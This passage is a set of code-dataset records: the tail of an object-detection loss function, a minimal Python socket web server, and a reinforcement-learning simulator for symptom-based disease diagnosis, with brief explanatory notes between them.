torch.floor(box_coords[0]*outputs.size()[3])\r\n x_off = box_coords[0]*outputs.size()[3]-x_grid\r\n y_grid = torch.floor(box_coords[1]*outputs.size()[2])\r\n y_off = box_coords[1]*outputs.size()[2]-y_grid\r\n\r\n x_grid = x_grid.long()\r\n y_grid = y_grid.long()\r\n\r\n \r\n ideal_out = torch.zeros((len(pwhs), outputs.size()[2], outputs.size()[3])).cuda()\r\n \r\n for j in range(len(anchors)):\r\n box_no = anchors[j]\r\n pred_xy = outputs[i, (box_no*5):(box_no*5 + 2), y_grid, x_grid]\r\n actual_xy = torch.tensor([x_off, y_off]).cuda()\r\n actual_xy = torch.log((actual_xy)/(1-actual_xy) + 1e-6)\r\n actual_xy = torch.clamp(actual_xy, min=-4, max=4)\r\n if verbose:\r\n print(f'xy {pred_xy} , {actual_xy} ______')\r\n #xy_loss += ((pred_xy-actual_xy)**2).sum()/(len(anchors))\r\n xy_loss += F.binary_cross_entropy(pred_xy, actual_xy, reduce=False).sum()\r\n #xy_loss += F.binary_cross_entropy(pred_xy, actual_xy, reduce=True)/(len(anchors))\r\n\r\n pwh = torch.tensor(pwhs[box_no]).cuda()\r\n actual_wh = torch.log((torch.tensor([(box_coords[2]), (box_coords[3])]).cuda()/pwh))\r\n pred_wh = outputs[i, (box_no*5 + 2):(box_no*5 + 4), y_grid, x_grid]\r\n #pred_wh = torch.mul(((Sigmoid(outputs[i, (box_no*5 + 2):(box_no*5 + 4), y_grid, x_grid])*2)**2), pwh)\r\n #pred_wh = torch.mul((torch.exp(outputs[i, (box_no*5 + 2):(box_no*5 + 4), y_grid, x_grid])), pwh)\r\n if verbose:\r\n print(f'wh {pred_wh} , {actual_wh} ______')\r\n wh_loss += ((pred_wh-actual_wh)**2).sum()/(len(anchors))\r\n\r\n pred = [(Sigmoid(pred_xy[0])+x_grid.float())/outputs.size()[3], (Sigmoid(pred_xy[1])+y_grid.float())/outputs.size()[2], torch.exp(pred_wh[0])*pwh[0], torch.exp(pred_wh[1])*pwh[1]]\r\n pred = torch.tensor(pred).float().cuda()\r\n iou_pred = pred_iou(pred, box_coords)\r\n if verbose:\r\n print(f'iou {iou_pred} ______')\r\n iou += iou_pred /(len(anchors))\r\n ideal_out[box_no, y_grid, x_grid] = torch.tensor([iou_pred]).cuda()\r\n\r\n \r\n obj_loss += F.binary_cross_entropy(Sigmoid(outputs[i,[k*5 + 4 for k in range(len(pwhs))],:,:]), ideal_out, reduce=False).sum()\r\n for anch in anchors_ioupass:\r\n if anch not in anchors:\r\n obj_loss -= F.binary_cross_entropy(Sigmoid(outputs[i,anch*5 + 4,y_grid,x_grid]), torch.tensor([0.0]).cuda(), reduce=False).sum()\r\n obj_loss /= (outputs.size()[3]*outputs.size()[2])\r\n obj_loss += F.binary_cross_entropy(Sigmoid(outputs[i,[k*5 + 4 for k in anchors],y_grid,x_grid]), ideal_out[anchors,y_grid,x_grid], reduce=False).sum()\r\n\r\n # obj_loss += focal_loss(Sigmoid(outputs[i,[k*5 + 4 for k in range(len(pwhs))],:,:]), ideal_out, 0).sum()\r\n # for anch in anchors_ioupass:\r\n # if anch not in anchors:\r\n # obj_loss -= focal_loss(Sigmoid(outputs[i,anch*5 + 4,y_grid,x_grid]), torch.tensor([0.0]).cuda(), reduce=False).sum()\r\n # obj_loss /= (outputs.size()[3]*outputs.size()[2])\r\n # obj_loss += F.binary_cross_entropy(Sigmoid(outputs[i,[k*5 + 4 for k in anchors],y_grid,x_grid]), ideal_out[anchors,y_grid,x_grid], reduce=False).sum()\r\n\r\n iou = iou/outputs.size()[0]\r\n xy_loss = l_xy*xy_loss/(outputs.size()[0])\r\n wh_loss = l_wh*wh_loss/(outputs.size()[0])\r\n obj_loss = l_obj*obj_loss/(outputs.size()[0])\r\n\r\n loss = xy_loss + wh_loss + obj_loss\r\n\r\n if print_losses:\r\n print(f'xy loss : {xy_loss}, wh loss : {wh_loss}, obj loss : {obj_loss}, iou : {iou}')\r\n\r\n return loss, xy_loss, wh_loss, obj_loss, 
iou\r\n","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":11430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
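
All three losses in the record above encode a normalised box centre as a grid cell plus an in-cell offset (x_grid = floor(x*W), x_off = x*W - x_grid). A tiny worked check of that round trip, added for clarity:

import torch

x, W = torch.tensor(0.37), 20          # normalised centre, grid width
x_grid = torch.floor(x * W)            # -> 7.0, the cell index
x_off = x * W - x_grid                 # -> 0.4, the offset inside the cell
assert torch.isclose((x_grid + x_off) / W, x)   # decodes back to 0.37
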
+{"seq_id":"566683890","text":"# coding:utf-8\n\nfrom multiprocessing import Process\nimport socket\n\n\nHTML_ROOT_DIR = ''\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_socket.bind(('', 8000))\nserver_socket.listen(128)\n\n\ndef handle_client(client_socket):\n '''\n handle a request from a client\n '''\n request_data = client_socket.recv(1024)\n\n # construct response\n response_start_line = 'HTTP/1.1 200 OK\\r\\n'\n response_header = 'Server: static_server\\r\\n'\n response_body = 'hello server'\n response = response_start_line + response_header + '\\r\\n' + response_body\n print(response)\n\n client_socket.send(bytes(response, 'utf-8'))\n\n client_socket.close()\n\n\ndef main():\n while True:\n client_socket, client_address = server_socket.accept()\n print('{} connected'.format(client_address))\n handle_client_process = Process(\n target=handle_client, args=(client_socket,))\n handle_client_process.start()\n client_socket.close()\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"static_server/static_web_server.py","file_name":"static_web_server.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
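
A quick way to exercise the server above is a raw-socket client. The helper below is hypothetical (not part of the original file); it sends a bare GET and returns whatever comes back.

import socket

def fetch(host="127.0.0.1", port=8000):
    # open a TCP connection, send a minimal HTTP/1.1 request, read one chunk
    with socket.create_connection((host, port)) as s:
        s.sendall(b"GET / HTTP/1.1\r\nHost: localhost\r\n\r\n")
        return s.recv(4096).decode("utf-8")

# expected reply: "HTTP/1.1 200 OK\r\nServer: static_server\r\n\r\nhello server"
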
+{"seq_id":"116952339","text":"import numpy as np\nimport random\nimport gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\nimport torch\nimport torch.nn as nn\nfrom torch.nn.parameter import Parameter\nimport torch.nn.functional as F\nimport logging\n\nclass Simple_multiclass(nn.Module):\n def __init__(self, input_dim, embed_dim, output_dim, cls=3):\n super(Simple_multiclass, self).__init__()\n self.cls = cls\n self.propensity = nn.Sequential(\n nn.Linear(input_dim, embed_dim), \\\n nn.ReLU(inplace=True), \\\n nn.Linear(embed_dim, embed_dim), \\\n nn.ReLU(inplace=True),\n nn.Linear(embed_dim, embed_dim), \\\n )\n self.classifier = nn.Sequential(\n nn.ReLU(inplace=True), \\\n nn.Linear(embed_dim, output_dim*cls)\n )\n \n def encode(self, x):\n return self.propensity(x)\n \n def forward(self, x):\n logits = self.classifier(self.encode(x)).view(x.shape[0], -1, self.cls)\n return logits\n \nclass Patient():\n def __init__(self, data_selfr, data_symp, data_dise, block_data, bg):\n self.selfrbase = data_selfr\n self.sympbase = data_symp\n self.disebase = data_dise\n self.block_data = block_data\n \n if bg == 'all':\n path = 'multiclassifier_prop_withtest_ori'\n else:\n path = 'multiclassifier_prop_ori'\n \n print(path)\n \n self.classifier = Simple_multiclass(66+4, 32, 66).cuda() \n self.classifier.load_state_dict(torch.load('checkpoints/new_exp_models/classifier/'+path))\n# self.reset_iterative()\n \n def _printf(self, sym_id, state):\n response_dict = {-1: \"I don't have %s\", 0: \"I'm not sure about %s\", 1: \"I have %s\"}\n print(response_dict[state]%(sym_list[sym_id]),sym_id)\n \n def report(self, rep):\n mask_poses = np.argwhere(rep != 0).reshape(-1)\n for mask_pos in mask_poses:\n self._printf(mask_pos, rep[mask_pos])\n \n def answer(self, query, verbose=False):\n if verbose: self.printf(query, self.state[0, query])\n return self.state[0, query]\n \n def sample(self, k = None, np_random=np.random):\n input_sample = np.concatenate([self.state, np.eye(4).astype(np.float32)[self.dise]], -1)\n pool_mask = self.pool*self.mask\n pool_sample = np.concatenate([pool_mask, np.eye(4).astype(np.float32)[self.disebase[self.indexes]]], -1)\n \n all_the_same = np.all(input_sample == pool_sample)\n \n if not all_the_same:\n input_sample_batch = np.concatenate([input_sample, pool_sample], 0)\n with torch.no_grad():\n prop_sample_batch = self.classifier.encode(torch.from_numpy(input_sample_batch).cuda())\n# distance = torch.sqrt(((prop_sample_batch[0]-prop_sample_batch[1:])**2/prop_sample_batch[1:].var(0)).sum(-1))\n distance = ((prop_sample_batch[0]-prop_sample_batch[1:])**2/prop_sample_batch[1:].var(0)).sum(-1)\n similarity = torch.nn.functional.softmax(-distance, -1).data.cpu().numpy()\n else:\n similarity = np.ones(pool_sample.shape[0])/pool_sample.shape[0]\n \n prop_ori = (np.eye(3)[self.pool.astype(np.int)+1] * similarity[:, None, None]).sum(0)\n prop = prop_ori[:, [0, 2]]\n prop_sum = prop.sum(1)\n unknown_pos = np.argwhere(prop_sum == 0)\n prop[unknown_pos] = 0.5\n prop = prop/prop.sum(1, keepdims=True)\n\n new_state = np_random.binomial(1, p = prop[:, 1], size=(1, 66))*2-1\n new_state[:, unknown_pos] = 0\n \n return new_state if k is None else new_state[0, k]\n \n def reset_iterative(self, id, np_random=np.random):\n self.id = id\n self.selfr = self.selfrbase[[self.id]]\n self.mask = self.selfr != 0\n if self.mask.sum() != 0:\n known_idx = np.argwhere(self.mask[0]).reshape(-1)\n known_idx = np_random.choice(known_idx, size = len(known_idx), replace=True)\n self.mask = 
np.zeros_like(self.selfr).astype(np.float32)\n self.mask[:, known_idx] = 1\n self.selfr = self.selfr*self.mask\n\n self.dise = self.disebase[[self.id]]\n self.state = np.array(self.selfr)\n self.indexes = self.disebase == self.dise[0]\n self.pool = self.sympbase[self.indexes]\n \n unknown = np.argwhere(self.mask[0] == 0) # this requires direction of symptom effect\n for unknown_pos in unknown:\n self.state[0, unknown_pos] = self.sample(unknown_pos, np_random=np_random)\n self.mask[0, unknown_pos] = 1\n \n \n def reset(self, id, np_random=np.random, allow_rep=False, exact=False):\n self.id = id\n \n resamp = True\n while resamp:\n resamp = False\n \n self.selfr = self.selfrbase[[self.id]]\n self.mask = self.selfr != 0\n if self.mask.sum() != 0 and not exact:\n known_idx = np.argwhere(self.mask[0]).reshape(-1)\n known_idx = np_random.choice(known_idx, size = len(known_idx), replace=True)\n self.mask = np.zeros_like(self.selfr).astype(np.float32)\n self.mask[:, known_idx] = 1\n self.selfr = self.selfr*self.mask\n\n self.dise = self.disebase[[self.id]]\n \n self.state = np.array(self.sympbase[[self.id]])\n if not exact:\n mask = np_random.randint(2, size=self.state.shape).astype(np.float32)\n self.state = self.state * mask\n self.state[self.selfr!=0] = self.selfr[self.selfr!=0]\n\n self.indexes = self.disebase == self.dise[0]\n self.pool = self.sympbase[self.indexes]\n\n self.mask = self.state != 0\n\n new_state = self.sample(np_random=np_random)\n self.state = new_state*(1-self.mask)+self.state*self.mask\n \n self.in_block_data = np.any(np.all(self.state == self.block_data, -1))\n \n if allow_rep and self.in_block_data:\n resamp = True\n\n \nclass MuzhiEnv():\n metadata = {'render.modes': ['human'], 'unknown':0, 'positive':1, 'negative':-1}\n \n def __init__(self, data_bg, mode='train', tol=11):\n with open('split_data/goal_dict_all_block.p', 'rb') as fhand:\n import pickle\n self.goal_dicts = pickle.load(fhand)\n fhand.close()\n \n with open('split_data/slot_set.txt', 'r') as fhand:\n self.sym_list = fhand.readlines()\n self.sym_list = [sym.strip() for sym in self.sym_list]\n fhand.close()\n \n with open('split_data/diseases.txt', 'r') as fhand:\n self.dise_list = fhand.readlines()\n self.dise_list = [dise.strip() for dise in self.dise_list]\n fhand.close()\n \n self.tol = tol\n self.mode = mode\n self.user_id = -1\n \n self.goals = self.goal_dicts[data_bg]\n \n data_symp = np.zeros((len(self.goals), len(self.sym_list)), dtype=np.float32)\n data_selfr = np.zeros((len(self.goals), len(self.sym_list)), dtype=np.float32)\n data_dise = np.zeros(len(self.goals), dtype=np.int)\n\n for i in range(len(self.goals)):\n c_goal = self.goals[i]\n for slot in c_goal['implicit_inform_slots']:\n data_symp[i][self.sym_list.index(slot)] = 1 if c_goal['implicit_inform_slots'][slot] else -1\n for slot in c_goal['explicit_inform_slots']:\n data_symp[i][self.sym_list.index(slot)] = 1 if c_goal['explicit_inform_slots'][slot] else -1\n data_selfr[i][self.sym_list.index(slot)] = 1 if c_goal['explicit_inform_slots'][slot] else -1\n data_dise[i] = self.dise_list.index(c_goal['disease_tag'])\n \n \n block_data_name = 'test_data_bgall'\n data_symp_block = np.zeros((len(self.goal_dicts[block_data_name]), len(self.sym_list)), dtype=np.float32)\n \n \n for i in range(len(self.goal_dicts[block_data_name])):\n c_goal = self.goal_dicts[block_data_name][i]\n for slot in c_goal['implicit_inform_slots']:\n data_symp_block[i][self.sym_list.index(slot)] = 1 if c_goal['implicit_inform_slots'][slot] else -1\n for slot in 
c_goal['explicit_inform_slots']:\n data_symp_block[i][self.sym_list.index(slot)] = 1 if c_goal['explicit_inform_slots'][slot] else -1\n \n self.patient = Patient(data_symp=data_symp, data_selfr=data_selfr, data_dise=data_dise, block_data = data_symp_block, bg=data_bg)\n self.seed()\n self.reset()\n \n def seed(self, seed=None):\n from gym.utils import seeding\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n \n def rewarding(self, info):\n if 'success' in info:\n return 10 if info['success'] else -100\n if 'repeat' in info:\n if info['repeat']:\n return -88\n else:\n return 0\n \n def step(self, action, verbose=False):\n assert self.done is False, \"It's game over now.\"\n info = {}\n reward = None\n \n if action < len(self.dise_list):\n self.done = True\n info['success'] = (action == self.dise)\n info['hit'] = (action == self.dise)\n else:\n action = action - len(self.dise_list)\n info['repeat'] = (self.have_visit[action] != 0)\n if not info['repeat']:\n self.obs[action] = self.state[action]\n self.have_visit[action] = 1.\n info['hit'] = (self.state[action] != self.metadata['unknown'])\n \n if verbose: print(\"%d %s\"%(self.state[action], self.sym_list[action]))\n self.runs += 1\n \n \n if self.runs >= self.tol and not self.done:\n info['leave'] = True\n info['success'] = False\n self.done = True\n \n reward = self.rewarding(info)\n assert reward is not None, \"You shoud design a reward for %s\"%(str(info))\n \n info['runs'] = self.runs\n return np.array(np.hstack((self.obs, self.have_visit))), reward, self.done, info\n \n def reset(self, verbose=False, allow_rep=False):\n self.runs = 0\n self.done = False\n if self.mode == 'train':\n self.user_id = self.np_random.randint(len(self.goals))\n elif self.mode == 'test':\n self.user_id = (self.user_id + 1)%len(self.goals)\n \n if self.mode == 'train':\n self.patient.reset(id=self.user_id, np_random=self.np_random, allow_rep=allow_rep) \n\n self.state = self.patient.state[0]\n self.obs = self.patient.selfr[0]\n self.dise = self.patient.dise[0]\n \n elif self.mode == 'test':\n selfr = self.patient.selfrbase[self.user_id]\n self.obs = np.array(selfr)\n state = self.patient.sympbase[self.user_id]\n self.state = np.array(state)\n self.dise = self.patient.disebase[self.user_id]\n \n \n self.have_visit = (self.obs != 0).astype(np.float32)\n\n if verbose: print(np.array(self.sym_list)[self.have_visit==1], self.dise_list[self.dise])\n return np.array(np.hstack((self.obs, self.have_visit)))\n \n def render(self, mode='human', close=False):\n return np.array(np.hstack((self.obs, self.have_visit))) \n\n\n\nclass Simple_classifier(nn.Module):\n def __init__(self, input_dim, embed_dim, output_dim):\n super(Simple_classifier, self).__init__()\n self.propensity = nn.Sequential(\n nn.Linear(input_dim, embed_dim*8), \\\n nn.LeakyReLU(0.1, inplace=True), \\\n nn.Linear(embed_dim*8, embed_dim), \\\n# nn.Softmax(-1), \\\n )\n self.classfier = nn.Sequential(\n nn.ReLU(inplace=True), \\\n nn.Linear(embed_dim, output_dim) \\\n )\n def encode(self, x):\n return self.propensity(x)\n \n def forward(self, x):\n logits = self.classfier(self.propensity(x))\n return logits\n\n\nclass DQN(nn.Module):\n def __init__(self, input_shape, hidden_size, num_actions, dueling=False):\n super(DQN, self).__init__()\n\n self.input_shape = input_shape\n self.num_actions = num_actions\n self.hidden_size = hidden_size\n self.dueling = dueling\n\n if self.dueling:\n self.model_obs = nn.Sequential(nn.Linear(input_shape, self.hidden_size), \\\n nn.ReLU(inplace=True), \\\n 
nn.Linear(self.hidden_size, self.hidden_size), \\\n nn.ReLU(inplace=True))\n\n self.model_adv = nn.Sequential(nn.Linear(self.hidden_size, self.hidden_size), \\\n nn.ReLU(inplace=True), \\\n nn.Linear(self.hidden_size, num_actions))\n\n self.model_val = nn.Sequential(nn.Linear(self.hidden_size, self.hidden_size), \\\n nn.ReLU(inplace=True), \\\n nn.Linear(self.hidden_size, 1))\n else:\n self.model_obs = nn.Sequential(nn.Linear(input_shape, self.hidden_size), \\\n nn.ReLU(inplace=True), \\\n nn.Linear(self.hidden_size, self.hidden_size), \\\n nn.ReLU(inplace=True), \\\n nn.Linear(self.hidden_size, self.num_actions))\n\n def forward(self, x):\n if self.dueling:\n feat = self.model_obs(x)\n adv = self.model_adv(feat)\n val = self.model_val(feat)\n\n out = val+adv-adv.mean(1, keepdim=True)\n else:\n out = self.model_obs(x)\n\n return out-x[:, self.num_actions:self.num_actions*2]*1000000\n\n def soft_update(self, state_dict, ratio = 0.9):\n model_dict = self.state_dict()\n for key in model_dict:\n model_dict[key].copy_(model_dict[key]*ratio+state_dict[key]*(1-ratio))\n self.load_state_dict(model_dict)\n\nclass ExperienceReplayMemory:\n def __init__(self, capacity, memory_type):\n self.capacity = capacity\n self.memory_type = memory_type\n self.buffer = []\n\n def push(self, s, a, r, d, s_):\n transition = np.hstack((s, [a, r, d], s_))\n self.buffer.append(transition)\n if len(self.buffer) > self.capacity:\n if self.memory_type == \"list\":\n del self.buffer[0]\n elif self.memory_type == \"random\":\n del self.buffer[np.random.randint(self.capacity)]\n\n def sample(self, batch_size):\n return random.sample(self.buffer, batch_size)\n\n def __len__(self):\n return len(self.buffer)\n \n def full(self):\n return len(self.buffer) == self.capacity\n\nclass ExperienceMemory:\n def __init__(self, capacity, memory_type):\n self.capacity = capacity\n self.memory_type = memory_type\n self.input_buffer = []\n self.label_buffer = []\n \n\n def push(self, input, label):\n self.input_buffer.append(input)\n self.label_buffer.append(label)\n \n if len(self.input_buffer) > self.capacity:\n if self.memory_type == \"list\":\n del self.input_buffer[0]\n del self.label_buffer[0]\n elif self.memory_type == \"random\":\n index = np.random.randint(self.capacity)\n del self.input_buffer[index]\n del self.label_buffer[index]\n\n def sample(self, batch_size):\n indexes = np.arange(len(self.input_buffer))\n indexes = np.random.choice(indexes, batch_size, replace=True)\n return np.array([self.input_buffer[index] for index in indexes]), np.array([self.label_buffer[index] for index in indexes])\n\n def __len__(self):\n return len(self.input_buffer)\n \n def full(self):\n return len(self.input_buffer) == self.capacity\n \n def erase(self):\n del self.input_buffer\n del self.label_buffer\n self.input_buffer = []\n self.label_buffer = []\n\nclass Agent(nn.Module):\n def __init__(self, state_len, action_len, dise_len, emb_len, params):\n super(Agent, self).__init__()\n self.state_len = state_len\n self.action_len = action_len\n self.dise_len = dise_len\n self.emb_len = emb_len\n self.conf_threshold = params['conf_threshold']\n self.device = params['device']\n self.random_start = params['random_start']\n self.num_bootstrap = params['num_bootstrap']\n self.dise_index = torch.arange(dise_len)[None, :, None].to(self.device)\n \n self.reclassifier = Simple_multiclass(66, 32, 66).cuda()\n self.optimizer_reclassifier = torch.optim.Adam(self.reclassifier.parameters(), lr = 1e-3)\n \n self.classifier3 = []\n self.optimizer_classifier3 = 
[]\n for i in range(self.num_bootstrap):\n self.classifier3.append(Simple_classifier(66, 8, 4).cuda())\n self.optimizer_classifier3.append(torch.optim.Adam(self.classifier3[i].parameters(), lr = 1e-3))\n \n self.classifier3_module = nn.ModuleList(self.classifier3)#+self.optimizer_classifier3)\n \n self.model = DQN(state_len, 128, self.action_len, params['dueling'])\n self.target_model = DQN(state_len, 128, self.action_len, params['dueling'])\n self.target_model.load_state_dict(self.model.state_dict())\n \n self.params = params\n self.batch_size = params['batch_size']\n self.memory_size = params['memory_size']\n self.memory = ExperienceReplayMemory(capacity=self.memory_size, memory_type=params['memory_type'])\n self.memory_checker = ExperienceMemory(capacity=self.batch_size*40, memory_type=params['memory_type'])\n self.gamma = params['gamma']\n self.epsilon = params['epsilon']\n self.target_update_freq = params['target_update_freq']\n self.elim_update_freq = params['elim_update_freq']\n self.soft_ratio = params['soft_ratio']\n \n self.learn_step_counter = 0\n \n self.criterion = nn.MSELoss()\n self.criterion_class = nn.CrossEntropyLoss()\n self.optimizer = torch.optim.Adam(self.model.parameters(), lr = params['lr'])\n self.scheduler = torch.optim.lr_scheduler.MultiStepLR(self.optimizer, params['update_steps'])\n \n \n def cal_prop_uncertainty(self, input_data, mask, sample_num = 1):\n samples = input_data\n props = []\n for i in range(self.num_bootstrap):\n props.append(torch.nn.functional.softmax(self.classifier3[i](samples), -1).view(-1, 1, 4))\n props = torch.cat(props, 1)\n# print(props.shape)\n return props.mean(1), props.std(1)\n \n def predict(self, s_t):\n with torch.no_grad():\n pre_dises = []\n for i in range(self.num_bootstrap):\n pre_dises.append(torch.nn.functional.softmax(self.checker_model[i](s_t[:, :self.action_len*2]), -1)[:, :, None])\n pre_dises = torch.cat(pre_dises, -1)\n confs = pre_dises.mean(-1)\n guess_dise = confs.max(-1, keepdim=True)[1]\n \n return guess_dise, confs\n \n def new_state(self, s_t, verbose=False):\n with torch.no_grad():\n prop_mean, prop_std = self.cal_prop_uncertainty(s_t[:, :66], s_t[:, 66:132], sample_num=50)\n prop_mean_maxval, prop_mean_maxind = prop_mean.max(1, keepdim=True)\n \n if verbose: print(\"Possible disease: %s, conf: %f\"%(patience.dise_list[int(prop_mean_maxind.item())],\\\n prop_mean_maxval.item()))\n s_t = torch.cat((s_t, prop_mean), 1)\n return s_t, prop_mean, prop_std\n \n def final_action(self, s_t, act_ind, prop_mean, prop_std, verbose=False):\n prop_mean_future = prop_mean + prop_std*3\n prop_mean_maxval, prop_mean_maxind = prop_mean.max(1, keepdim=True)\n number = (prop_mean_future >= prop_mean_maxval).float().sum().item()\n \n if verbose:\n print(\"guess_confs is %s, future_confs is %s, number is %f\"%(prop_mean[0].cpu().data.numpy(), prop_mean_future[0].cpu().data.numpy(), number))\n \n if number > 1:\n if verbose:\n print(\"Have better choice.\")\n return act_ind + self.dise_len\n else:\n if verbose:\n print(\"No better choice.\")\n return prop_mean_maxind[0].item()\n \n def choose_action(self, s_t, prop_mean, prop_std, test=False, verbose=False):\n with torch.no_grad():\n a_val = self.model(s_t)\n if (np.random.uniform() < self.epsilon or self.learn_step_counter < 1000) and not test:\n a = np.random.choice(np.argwhere(s_t[0, self.action_len:self.action_len*2].cpu().data.numpy() == 0).reshape(-1))\n if verbose: print(\"Choose symptom randomly: \", patience.sym_list[a])\n else:\n a = a_val.max(1)[1].view(-1).item()\n if 
verbose:\n print(\"Choose symptom: \", patience.sym_list[a])\n# print(\"q values: \", a_val[0].cpu().data.numpy(), \" id: \", a)\n assert s_t[0, self.action_len+a].item() == 0, \"q values: %s id: %d\"%(a_val[0].cpu().data.numpy(), a)\n if verbose: print(\"Q values examples %s\"%(a_val[0].cpu().data.numpy()[:5]))\n \n a_ = self.final_action(s_t, a, prop_mean, prop_std, verbose = verbose)\n \n return a_, a\n \n def forward(self, s_t, verbose=False):\n return self.model(s_t)\n \n def compute_loss(self, s_t, act, rew, done, s_tplus1):\n q_vals = self.model(s_t)\n q_val = q_vals.gather(1, act) # because r is for act\n with torch.no_grad():\n q_vals_next = self.model(s_tplus1)\n q_vals_targ = rew + (1-done)*self.gamma*(q_vals_next.detach().max(1)[0].view(-1, 1)) # how about done?\n \n loss = self.criterion(q_val, q_vals_targ.detach())\n return loss\n \n def learn(self, batch_size):\n if (self.learn_step_counter % self.target_update_freq == 0):\n# print(\"Updating ... \")\n self.target_model.soft_update(self.model.state_dict(), self.soft_ratio)\n \n self.learn_step_counter += 1\n \n batch_trans = np.array(self.memory.sample(batch_size=batch_size))\n st, en = 0, self.state_len\n batch_s = torch.FloatTensor(batch_trans[:, st:en]).to(self.params['device'])\n st, en = en, en+1\n batch_a = torch.LongTensor(batch_trans[:, st:en].astype(np.int)).to(self.params['device'])\n st, en = en, en+1\n batch_r = torch.FloatTensor(batch_trans[:, st:en]).to(self.params['device'])\n st, en = en, en+1\n batch_d = torch.FloatTensor(batch_trans[:, st:en]).to(self.params['device'])\n st, en = en, en+self.state_len\n batch_s_ = torch.FloatTensor(batch_trans[:, st:]).to(self.params['device'])\n \n loss = self.compute_loss(batch_s, batch_a, batch_r, batch_d, batch_s_)\n \n self.optimizer.zero_grad()\n loss.backward()\n for p in self.model.parameters(): p.grad.data.clamp_(min=-5., max=5.)\n self.optimizer.step()\n \n def update_reclassifier(self, verbose=False):\n if (self.learn_step_counter % self.target_update_freq != 0):\n return\n if verbose:\n print(\"#### UPDATE CHECKER ####\")\n input_data_input_mask, input_label = self.memory_checker.sample(self.batch_size)\n\n input_data = input_data_input_mask[:, :66]\n input_mask = input_data_input_mask[:, 66:]\n \n input_data_masked = torch.from_numpy(np.random.randint(2, size=input_data.shape).astype(np.float32)*input_data).to(self.params['device'])\n input_data = torch.from_numpy(np.array(input_data).astype(np.float32)).to(self.params['device'])\n input_mask = torch.from_numpy(np.array(input_mask).astype(np.float32)).to(self.params['device'])\n input_label = torch.from_numpy(np.array(input_label).astype(np.int)).to(self.params['device'])\n \n self.optimizer_reclassifier.zero_grad()\n output_logits = self.reclassifier(input_data_masked)[input_mask==1]\n mask_label = input_data[input_mask==1]\n ce_loss = self.criterion_class(output_logits, (mask_label+1).long())\n ce_loss.backward()\n self.optimizer_reclassifier.step()\n\n \n def update_checker(self, verbose=False):\n if (self.learn_step_counter % self.target_update_freq != 0):\n return\n \n for i in range(self.num_bootstrap):\n input_data_input_mask, input_label = self.memory_checker.sample(self.batch_size)\n input_data = input_data_input_mask[:, :66]\n input_mask = input_data_input_mask[:, 66:]\n\n input_data = torch.from_numpy(np.array(input_data).astype(np.float32)).to(self.params['device'])\n input_mask = torch.from_numpy(np.array(input_mask).astype(np.float32)).to(self.params['device'])\n input_label = 
torch.from_numpy(np.array(input_label).astype(np.int)).to(self.params['device'])\n\n\n self.optimizer_classifier3[i].zero_grad()\n ce_loss = self.criterion_class(self.classifier3[i](input_data), input_label)\n ce_loss.backward()\n self.optimizer_classifier3[i].step()\n\ndef eval_all_patience(doctor, patience, writer, i_episode_out, verbose=False, threshold=0.):\n patience.user_id = -1\n ep_r = 0\n ep_s = 0\n ep_t = 0\n ep_ts = 0\n ep_o = 0\n ep_repeat = 0\n ep_conf = 0\n ep_num = 0\n ep_num_valid = 0\n ep_s_force = 0\n for i_episode in range(len(patience.goals)):\n obs = patience.reset()\n if verbose:\n print(\"########## id %d with dise %s ##########\"%(patience.user_id, patience.dise_list[patience.dise]))\n print(\"[Usr] %s\"%(np.array(patience.sym_list)[obs[66:132] != 0]))\n while True:\n obs_tensor = torch.from_numpy(obs.reshape(1, -1)).cuda()\n obs_tensor, prop_mean, prop_std = doctor.new_state(obs_tensor)\n a_act, _ = doctor.choose_action(obs_tensor, prop_mean, prop_std, test=True, verbose=False)\n \n if a_act < doctor.dise_len:\n if verbose: print(\"[Doc(%s, %.2f)] You got %s\"%(patience.dise_list[a_act], prop_mean[0, a_act], patience.dise_list[a_act]))\n else:\n if verbose: print(\"[Doc(%s, %.2f)] Do you have %s\"%(patience.dise_list[prop_mean.max(1)[1].item()], prop_mean.max(1)[0].item(), patience.sym_list[a_act-4]))\n \n obs_, r, done, info = patience.step(a_act)\n \n if verbose and not done: print(\"[Usr] %s\"%({-1: \"No\", 0: \"Not-sure\", 1:\"Yes\"}[obs_[a_act-4]]))\n \n ep_r += r\n if 'repeat' in info and info['repeat']:\n ep_repeat += 1\n \n if done:\n ep_t += info['runs']\n if info['success']:\n ep_s += 1\n if 'leave' not in info or not info['leave']:\n ep_num_valid += 1\n ep_ts += info['runs']\n ep_s_force += (prop_mean.max(1)[1].item() == patience.dise).item()\n ep_o += obs_[66:66*2].sum()\n ep_conf += prop_mean.max(1)[0].item()\n ep_num += 1\n break\n \n obs = obs_\n \n print(\"%s: numb %d | avg conf is %.2f | avg success is %.3f | avg success valid is %.3f | avg success force is %.3f| avg run is %.2f | avg repeat is %.2f | avg obs is %.2f\"%\\\n (patience.mode, ep_num, ep_conf/ep_num, ep_s/ep_num, (ep_s/ep_num_valid if ep_num_valid > 0 else 0), ep_s_force/ep_num, ep_t/ep_num, ep_repeat, ep_o/ep_num))\n \n logging.info(\"acc %.4f turn %.4f acc_valid %.4f turn_valid %.4f, acc_invalid %.4f valid %d conf_mean %s conf_std %s\"%\\\n (ep_s_force/ep_num, ep_t/ep_num, (ep_s/ep_num_valid if ep_num_valid > 0 else 0),\\\n (ep_ts/ep_num_valid if ep_num_valid > 0 else 0), ep_s/ep_num, ep_num_valid, prop_mean[0].data.cpu().numpy(), prop_std[0].data.cpu().numpy()))\n \n return ep_s_force/ep_num\n\n\n","sub_path":"code/camad_direct.py","file_name":"camad_direct.py","file_ext":"py","file_size_in_byte":28918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
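
One detail in the record above worth isolating: DQN.forward masks actions that were already taken by subtracting a huge constant from their Q-values (out - visited*1000000), so argmax can never pick a repeated symptom query. A minimal standalone check of that trick:

import torch

q = torch.tensor([[0.5, 2.0, 1.0]])
visited = torch.tensor([[0.0, 1.0, 0.0]])   # action 1 was already asked
masked = q - visited * 1000000              # its Q-value becomes hugely negative
assert masked.argmax(1).item() == 2         # best remaining action, never action 1
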
